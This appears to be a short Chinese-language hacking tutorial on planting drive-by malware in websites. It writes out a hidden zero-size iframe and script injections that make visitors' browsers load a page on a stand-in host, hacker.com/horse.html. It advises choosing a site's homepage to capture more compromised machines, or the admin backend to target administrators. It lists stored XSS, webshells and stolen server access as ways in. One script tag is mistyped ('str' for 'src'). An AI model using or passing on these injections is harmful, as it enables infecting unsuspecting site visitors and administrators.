我覺得網頁掛馬要考慮兩個因素:隱蔽性、成功率。
我們只需保證瀏覽器加載並執行我們構造的特殊網頁即可,這樣的方法有許多。
方法一,我們可以在首頁加入以下這行代碼。
<iframe src="http://www.hacker.com/horse.html" width=0 height=0></iframe>
方法二,我們可以在首頁加入以下這行代碼。
<script str="http://www.test.com/horse.js"></script>
horse.js可以這樣寫:
new Image.src="http://www.hacker.com/horse.html";
或者
document.write("<iframe src='http://www.hacker.com/horse.html' width=0 height=0></iframe>");
考慮到隱蔽性建議採用第二種方法。掛在首頁是因爲首頁的訪問量是最大的,這樣可以收穫更多的肉雞。當然,如果你的目標僅是網站管理員,那麼你可以考慮掛在後臺主頁,當然還可以加其它條件以提高定點掛馬的精準度。
什麼情況下可以進行網頁掛馬,這個就看你思路夠不夠猥瑣了。比如:1.有後臺管理權限;2.拿下了webshell;3.拿下了服務器;4.存儲型 XSS;
